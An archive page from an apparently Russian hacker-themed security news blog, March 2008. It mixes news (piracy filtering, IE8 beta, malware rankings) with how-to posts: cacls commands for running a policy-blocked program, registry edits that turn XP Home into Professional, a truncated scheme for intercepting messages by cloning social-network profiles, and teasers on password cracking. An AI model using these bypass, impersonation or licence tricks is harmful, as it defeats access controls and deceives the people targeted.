| RSS



Меню

Bookmark and Share


Календарь
«  Март 2008  »
ПнВтСрЧтПтСбВс
     12
3456789
10111213141516
17181920212223
24252627282930
31

Статистика
Ваш IP: 3.137.190.44
Вы используете: v





Сейчас на сайте:

Тех поддержка ->

Облако тэгов
ОС видио Tor Обратная сторона антенна 4.6 PHP Эксплоит Windows Server 2008 qip Virtual chroot kernel proc sysctl tune FreeBSD bridge Boot Disk Bluetooth GEO game directx Emulator Python Shell DDoS червь Conficker вирус троян Лаборатория Касперского пиратство apple iPhone ИТ-отрасль Щеголев Microsoft экономический кризис Twitter социальная сеть анонимность Лицензия Open Source ASP.NET MVC уязвимость MySQL база данных файлообмен закон франция пират Skype мобильный Deutsche Telekom Хакер киберпреступник Trend Micro кибератака Германия робот утечка данных персональные данные ноутбук интернет Китай цензура ядро Linux Торвальдс Windows Vista Acer Linux патент браузер Firefox Internet Explorer Opera Net Applications Safari Intel Linux Foundation Moblin Oracle патч банкомат кардер HSM IBM X-Force Cofee сша кибервойна Эстония Dell ИТ-специалист хакерские атаки Pirate Bay контроль кибербезопасность язык программирования The Pirate Bay Пиратская партия утечка информации приговор Mozilla Chrome безопасность Госдума СМИ Windows 8 Баллмер взлом Пентагон ботнет Украина Facebook Cisco cloud Windows XP нетбук торрент музыка биометрический nokia ФБР IP-адрес CIPAV Comcast sms RSA java Google CAPTCHA Symantec спам конфиденциальная информация инсайдер Perimetrix антивирус тест Anti-Malware Windows 7 операционная система Windows провайдер авторское право RapidShare UNIX свиной грипп шантаж дети EFF BluWiki копирайт экстремизм Panda Security cloud computing McAfee Cybercrime Response Unit Bottle Domains HTTPS ICANN студент шпионское ПО Норвегия школьник New York Times XSS YouTube Warner Music кибершпионаж КНДР Ubuntu свободное ПО AMD ATI касперский Россия РФ сервер хостинг фальшивый антивирус Comodo CA Wi-Fi D-Link суд пароль блог фишинг Одноклассники медведев контрафакт мошенник штраф Sony GPS по Gumblar JAVASCRIPT хакеры вредоносное ПО Yahoo ФАС компьютер Софт MPAA кибероружие PandaLabs Red Hat Минкомсвязи сбой ASUSTeK Computer мошенничество Доктор Веб ВКонтакте Cyber-Arc исходный код PCI DSS МВД фильтр порнография BREIN свобода слова Казахстан GEMA Autodesk сисадмин Gmail кредитная карта кибермошенник LiveJournal шифрование криптография Deep Purple банк нанотехнологии Wikipedia zero-day ColdFusion выборы кража данных DNS BIND Android BASIC атака Black Hat Mac OS X Click Forensics Clampi домен фсб Прокуратура Уголовное дело icq Barrelfish киберпреступность Sophos AT&T ошибка Electa Gamma Knife OpenBSD DARPA военные Сайт Visual Studio 2010 .NET Framework 4 Chrome OS электронная почта турция конференция спамер FTC полиция российская ОС Koobface Великобритания БЕЛОРУССИЯ грузия BSA Bittorrent облачные вычисления Azure Европа Dr.Web Билл Гейтс спецслужбы Cryzip Живой Журнал Royal Bank of Scotland смартфон Canonical Pwn2Own F-Secure Symbian Hotmail фильм

Главная » 2008 » Март » 09
Фильтрация трафика в компаниях-провайдерах интернета может сократить размах "цифрового пиратства", в частности - файлообмена, на 70%. Такой вывод сделали британские юристы в сфере интеллектуальной собственности на основе проведенного среди пользователей исследования. Так, две трети респондентов заявили, что скорее всего прекратят обмен MP3-файлами и фильмами, если будут получали грозные предупреждения от ISP-провайдера. К удивлению юристов, готовность отказаться от использования пиринговых сетей чаще выражала молодежь, чем люди старшего возраста. В то же время 68% опрошенных сомневаются в том, что их поймают.

Музыкальная и киноиндустрия утверждают, что из-за файлообмена они ежегодно теряют миллиарды долларов. Борьба с незаконным копированием и распространением цифровых файлов уже давно стала серьезной проблемой для многих стран. В Великобритании, в частности, интернет-провайдерам и владельцам контента предложено самостоятельно продумывать пути ее решения. В противном случае в апреле 2009 власти планируют разбираться с ней законодательно. Эксперты считают, что, вероятно, на вооружение будет взята "поэтапная" модель, которая действует сейчас во Франции. Провайдер сначала предупреждает нарушителей, а затем блокирует доступ к интернету.









Категория: | Просмотров: 2224 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

Компания Microsoft выпустила первую бета-версию браузера Internet Explorer 8. Программа пока предназначена только для веб-разработчиков и дизайнеров для ознакомления.

По сравнению с IE 7 новая версия браузера Microsoft претерпела существенные изменения. Прежде всего, стоит выделить новую функцию под названием Activities. Через контекстное меню, вызываемое правой кнопкой мыши, пользователь может быстро совершить то или иное действие с объектами на веб-странице, например, добавить материал на сайт Digg.com, перевести фрагмент текста, произвести поиск в интернете и так далее. Другим заметным нововведением стала функция WebSlices. Данная система представляет собой некое подобие RSS-потоков, позволяя пользователям получать уведомления о любых изменениях на выбранной странице.

В Internet Explorer 8 появилась усовершенствованная панель избранных ссылок, а также антифишинговый фильтр с расширенными возможностями. Кроме того, стоит выделить средства безопасности Automatic Crash Recovery, которые позволяют восстановить все ранее открытые табы после аварийного завершения работы браузера.

Стоит добавить, что Internet Explorer 8 по умолчанию будет работать в режиме наиболее полной совместимости с современными веб-стандартами. Кроме того, браузер сможет осуществлять рендеринг сайтов в соответствии со стандартами, которые были широко распространены на момент выхода Internet Explorer 7 в 2006 году.

Бета-версия Internet Explorer 8 ориентирована, в первую очеред ... Читать дальше »
Категория: | Просмотров: 2067 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

Российское издательство BitDefender, разработчика антивирусных решений и программного обеспечения в области защиты информации, представляет список угроз информационной безопасности в мире за февраль 2008 г. Среди наиболее часто встречающихся вирусов в прошлом месяце стали письма с запакованными вредоносными программами (37,07%) и троян Peed, известный также под именем Storm (16,88%), которого не было в январском списке десяти наиболее распространенных вирусов.

«Авторы вирусов стали широко использовать архивирование, чтобы уменьшить размер вируса и увеличить преграды для его анализа – распаковка архивированных файлов требует от антивируса дополнительной функциональности и затрат времени, а также ресурсов системы», – говорит руководитель исследовательской лаборатории BitDefender Сорин Дудеа (Sorin Dudea).

«Популярность» уязвимости Windows, связанной с открытием и обработкой браузером Internet Explorer вредоносных файлов в формате wmf (Windows Meta File), уменьшилась по сравнению с предыдущими месяцами: количество вирусов, использовавших ее, составило 5.33% от общего числа обнаруженных вирусов.

Шесть последних позиций в списке занимают «старые», уже исчезающие, массовые почтовые вирусы. На них приходится около 10% от общего числа обнаруженных угроз, включая вирус Netsky.P, который показал наибольшую активность – 3.36%.

«Опираясь на эти результаты и статистику предыдущих месяцев можно с уверенностью сказать, что вирус Netsky.P – наиболее распростран ... Читать дальше »
Категория: | Просмотров: 2210 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)


Специалист по безопасности из Новой Зеландии придумал способ обхода парольной защиты Windows XP в считанные секунды. Для этого он предлагает использовать распространенный на сегодняшний день интерфейс FireWire. Автор утверждает, что Microsoft знает о данной дыре уже как минимум два года, однако так и не удосужилась ее устранить.

Специалист по компьютерной безопасности Адам Бойли (Adam Boileau) из новозеландской компании Immunity может обойти пароль Windows XP за несколько секунд. На персональном сайте он опубликовал инструкцию по доступу к Windows XP, заблокированной по Alt+Ctrl+Del или через экран приветствия, без необходимости ввода пароля.

Для выполнения операции необходим второй компьютер на базе Linux, который должен быть подключен к целевому компьютеру посредством интерфейса FireWire. Далее специальный скрипт открывает полный доступ к оперативной памяти взламываемого компьютера, из которой хакер может читать информацию или записывать в нее. Таким образом злоумышленник может узнать в том числе и требуемый пароль.

Разъемами FireWire оснащаются многие настольные ПК и почти все современные ноутбуки. Их нельзя найти разве что в старых системах. В основном FireWire служит для подключения внешних накопителей данных.

Данный способ был придуман Бойли еще в далеком 2006 г. Однако тогда он не решился обнародовать документацию, так как Microsoft не нашла данную брешь существенной, и Бойли решил зря не будоражить индустрию. Однако сейчас, спустя 2 ... Читать дальше »
Категория: | Просмотров: 2208 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

В последнее время популярность так называемых социальных сетей растет невиданными темпами, как в России, так и за ее пределами. Предполагаю, что уже много сказано и написано о ненадежности такого способа общения, возможностях утечки и откровенного «слива» информации. Однако, в большинстве случаев рассматриваются варианты, связанные с захватом учетных записей, нелегитимным использованием компьютеров, взломом защиты сайтов, перехватом пакетов в сети. Однако существует совсем иной вариант перехвата информации, не требующий незаконного вмешательства в работу сервера или пользовательских компьютеров. Более того, такой способ перехвата, почти неуязвим с юридической точки зрения и при грамотном его использовании крайне сложно заметить перехват. Довольно интриги – к делу.

Предположим, что есть две персоны (X и Y), которые связаны между собой (обмениваются информацией) через социальную сеть. Технология подходит практически для любой социальной сети, но для примера будем рассматривать популярную российску сеть «В контакте». Итак есть X, Y и я – MP (Майор Пронин). В качестве майора могу выступать не только я, но и жена, любовница, родители, дети, конкуренты и т. п. любого из персонажей X и Y. MP хочет получать информацию, передаваемую между X и Y, а в некоторых случаях изменять ее. Что же нужно сделать для перехвата информации?
Во время отсутствия в сети персонажей X и Y создаются «клоны» их страниц с переносом публично доступной информации (имя, фамилия, опубликованные данные ... Читать дальше »
Категория: | Просмотров: 2272 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

Ну что же, разопьем по бутылочке темного пива и продолжим знакомиться с возможностями Windows Vista, доступными разработчикам программного обеспечения (или, как подсказывает Крыс Касперски из своей глубокой норы в недрах аргентинского болота, «точить»). На этот раз давай посмотрим, что же изменилось в операционной системе с точки зрения шифрования данных. А изменилось, надо сказать, немало: начиная с основательного обновления CryptoAPI и заканчивая созданием принципиально новой сущности – криптоядра CNG (Cryptography API Next Generation). Дело за малым – разобраться со всем этим богатством и научиться применять криптотехнологии WV на практике.
Windows Crypto – время перемен

Aaloha, Guy! Думаешь, ты уже изучил Висту вдоль и поперек и познакомился со всеми ее фишками? Не тут-то было. Пора копнуть глубже и заглянуть ей под капот. Видишь во-о-он ту блестящую штуковину с моторчиком? Нравится? А знаешь, что это такое? Нет? Ну тогда слушай и запоминай.

Итак, на повестке дня - криптосистема Windows Vista.

Если тебе приходилось использовать криптографические возможности более ранних версий Винды, ты должен знать, что доступ к этим возможностям предоставляется системой CAPI (Crypto API). Так вот Vista несет на своем борту новую, не столь убогую, как в Windows XP, версию CAPI. Но как это дело не причесывай, конфетку из него все равно не сделаешь. И в Microsoft это хорошо понимают. Нет, они не переписали CAPI с нуля (на фига напрягаться), они просто засунули CAPI ... Читать дальше »
Категория: | Просмотров: 2362 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

Развитие современных компьютерных технологий поражает. Устройства становятся меньше, а вычислительные способности удваиваются, чуть ли не каждый год! Уже ни кого не удивить высокоскоростным доступом ADSL, беспроводным Wi-Fi и тем более GRPS и его продолжением - EDGE. На рядового пользователя трудится даже космическая отрасль. Вывод спутников на орбиту - колоссальные затраты, а все ради того, что бы мы могли наслаждаться спутниковым телевидением и спутниковым Интернетом. Скорость и дешевизна, зачастую являются главным критерием при выборе подключения к Интернет. Спутниковый доступ к сети - самый оптимальный вариант, но и самый ненадежный - в плане безопасности.

Внимание! Цель данной статьи - рассмотреть возможность перехвата информации в спутниковых сетях и варианты защиты. Автор не несет ответственности за возможное применение полученной информации из статьи в противозаконных целях. Данная технология описана для общего развития, но ни как руководство к действию.
Атака

Для начала давайте разберемся, каким образом информация передается по спутниковым каналам связи. Система основана на том, что клиентский компьютер по наземным каналам связи передает запрос в дата центр на получение какой либо информации из Интернета. В датацентре запрос обрабатывается и он загружает все по тем же наземным каналам связи информацию, которую запросил клиент. Далее из датацентра информация идет на транспондер, в задачи которого входит передать информацию на спутник. Вот тут и открыв ... Читать дальше »
Категория: | Просмотров: 2227 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

Пользователь, работающий с Secondary Login Service (Run As) может повысить свои привилегии. Если доступ к программе запрещен через групповую политику, просто скопируй его в любое место куда разрешена запись и сделай Run As от своего имени - он запустится. Дело в том, что при копировании права на файл меняются - ведь копирующий получает права создателя/владельца. Пример (пользователь test не админ):

cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
FILE_EXECUTE

BUILTIN\Users:(DENY)(Special access:)
WRITE_DAC
WRITE_OWNER

BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
WINXP01\test:F
BUILTIN\Users:R

C:\noexec>notepad.exe
Access denided.

C:\noexec>cacls.exe notepad.exe /G test:F
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F

C:\noexec>notepad.exe

Выход - выключить Secondary Logon:

sc stop seclogon
sc config seclogon start= disabled




Категория: | Просмотров: 2849 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (2)

При помощи довольно простых манипуляций можно превратить Windows XP Home Edition в Windows XP Professional.

Рассказываю по шагам:
Копируем дистрибутив с компакт-диска на винт.
Извлекаем Bootsector из Windows XP CD. Для этого можно использовать, например, программу BBIE.
Запускаем Regedit, в дереве выбираем HKEY_LOCAL_MACHINE и в меню давим "Загрузить куст". Находим Setupreg.hiv в папке i386 дистрибутива и загружаем его.
Находим ключ HKEY_LOCAL_MACHINE\Homekey\ControlSet001\Services\setupdd и в ключе Default изменяем значение 01 на 00, 02 на 00. Изменяем имя HOMEKEY на произвольное.
Находим HKEY_LOCAL_MACHINE\Homekey\ControlSet001\Services\setupdd. Редактируем ключ Default по аналогии с предыдущим шагом.
Выделяем HOMEKEY и в меню давим "Выгрузить куст".

Теперь можно записать дистрибутив на CD и установить с него уже полноценную Windows XP.



Категория: | Просмотров: 2425 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

Одна из самых распространенных задач хакера - взлом локального пароля операционной системы. С появлением Windows Vista обновилось и понимание задачи - старые методы и инструменты для взлома локального пароля Vista не подходят, наиболее распространенные системы не понимают ульи SAM и SYSTEM.

Например Ophcrack пишет "Error: no valid hash was found in this file", а Cain "Couldn't find lsa subkey in the hive file.". Но в то же время программа Sala Password Renew из системы Bart PE может быть благополучно использована для замены любого пароля или же создания нового администраторского аккаунта. В некоторых ситуациях такое решение не применимо, вряд ли кто захочет выставлять напоказ свое присутствие в системе или же логин с паролем могут использоваться для сетевой работы и сброс пароля приведет к потере полноценной работы. Еще один повод все-таки узнать настоящий пароль - Windows EFS (Encrypted File System). В случае сброса пароля данные могут потеряться, не факт, но ситуация вероятна, так что экспериментировать с потерей важных данных могут лишь особо отважные герои.

Казалось бы ситуация безвыходная, но как и в случае с большинством продуктов Microsoft все оказалось достаточно просто - главное знать правильный подход. В этом случае казалось бы неприступная система окажется дырявой как решето. Оказалось, что наши любимые ребята из ElcomSoft уже вроде как добавили поддержку SAM и SYSTEM файлов Vusta в утилиту Proactive Password Auditor 1.61. Пока что она платная, но в ... Читать дальше »
Категория: | Просмотров: 4241 | Добавил: aka_kludge | Дата: 10.03.2008 | Комментарии (0)

    Главная      
...
На службе : дней

21:10
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск

Архив записей


Copyright tHR - TeAM 2024 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, ... Яндекс.Метрика